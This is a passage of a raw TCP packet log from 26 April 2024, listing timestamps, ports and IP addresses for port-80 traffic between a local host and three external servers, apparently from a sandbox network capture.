Apr 26, 2024 17:11:06.926546097 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926562071 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926572084 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926578999 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926603079 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926610947 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926644087 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926652908 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926660061 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926676989 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926702023 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926808119 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926825047 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926841974 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926851034 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926857948 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926873922 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926876068 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926888943 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926913977 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.926948071 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926983118 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.926991940 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927000999 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927031040 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927037954 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927050114 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927109957 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927114010 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927134037 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927150011 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927175045 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927181959 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927197933 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927217960 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927231073 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927277088 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927284956 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927303076 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927319050 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927335978 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927340031 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927367926 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927375078 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927445889 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927463055 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927479982 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927486897 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927496910 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927512884 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927598000 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927614927 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927639961 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927644014 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927661896 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927678108 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927681923 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927695036 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927711010 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927714109 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927727938 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927738905 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927750111 CEST	80	49712	185.172.128.59	192.168.2.5
Apr 26, 2024 17:11:06.927810907 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:06.927870035 CEST	49712	80	192.168.2.5	185.172.128.59
Apr 26, 2024 17:11:07.675259113 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:07.940531015 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:07.940665960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:07.945858002 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.214036942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214071035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214092016 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214147091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.214150906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214274883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214322090 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.214365959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214457035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214500904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.214555025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214601994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214644909 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.214684963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214787960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.214829922 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.286271095 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:08.478595018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478625059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478660107 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478728056 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.478739977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478796959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.478820086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478893042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478945017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.478945971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479038954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479072094 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479120970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479120970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479155064 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479211092 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479234934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479280949 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479284048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479343891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479425907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479477882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479520082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479562998 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479619026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479660988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479720116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479768991 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.479809046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.479852915 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.527609110 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:08.531145096 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:08.743179083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.743211985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.743232012 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.743339062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.743376970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.743427992 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.743510008 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.744349003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.744431019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.744441032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.744505882 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.744558096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.744605064 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.745034933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745091915 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.745136023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745176077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745222092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745270967 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.745362043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745410919 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.745484114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745559931 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745649099 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745698929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745702982 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.745745897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.745767117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745883942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.745987892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746040106 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.746112108 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746164083 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.746167898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746243954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746279001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746321917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746331930 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.746366978 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.746407986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746505976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746552944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746598005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.746640921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.746694088 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.746855974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747226000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747329950 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747389078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.747432947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747471094 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747481108 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.747523069 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747603893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747658968 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.747701883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747746944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:08.747787952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.747863054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:08.749123096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.010586977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010643959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010679960 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010716915 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010740042 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.010751963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010788918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010788918 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.010909081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010945082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.010963917 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.010998964 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.011626005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.011662006 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.011713028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.011722088 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.011809111 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.011877060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.011925936 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.011933088 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.011972904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.011990070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.012022972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.012085915 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.012135029 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.012139082 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.012183905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.012716055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013641119 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013700962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013750076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013758898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.013786077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013794899 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.013851881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013915062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013948917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.013969898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.013983965 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.014007092 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.014049053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.014081955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.014132023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.014168024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.014215946 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.014255047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015151024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015187025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015234947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015245914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.015281916 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.015316963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015382051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015799999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015849113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015857935 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.015898943 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.015918016 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.015952110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.016017914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.016052008 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.016074896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.016113997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.017096996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017136097 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017169952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017220020 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.017401934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017458916 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.017657995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017694950 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017761946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017813921 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.017914057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017961025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.017961979 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.017996073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018060923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018111944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.018182993 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018218040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018234015 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.018250942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018313885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018347979 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018361092 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.018394947 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.018399000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018491030 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.018948078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019007921 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.019012928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019079924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019113064 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019133091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.019159079 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.019185066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019218922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019329071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019375086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.019382954 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.019426107 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.020085096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020150900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020395994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020431042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020452023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.020463943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020476103 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.020575047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020608902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020657063 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.020728111 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.020777941 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.021609068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.021627903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.021677971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.021706104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.021755934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.023036003 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275091887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275125980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275145054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275163889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275187969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275204897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275223017 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275298119 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275316000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275321007 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275321007 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275387049 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275403976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275432110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275453091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275588036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275609016 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275624990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275643110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275657892 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275660992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275681019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275692940 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275727987 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275788069 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275806904 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275849104 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275850058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275867939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275886059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275912046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.275919914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275965929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.275985003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276012897 CEST	49713	80	192.168.2.5	176.97.76.106
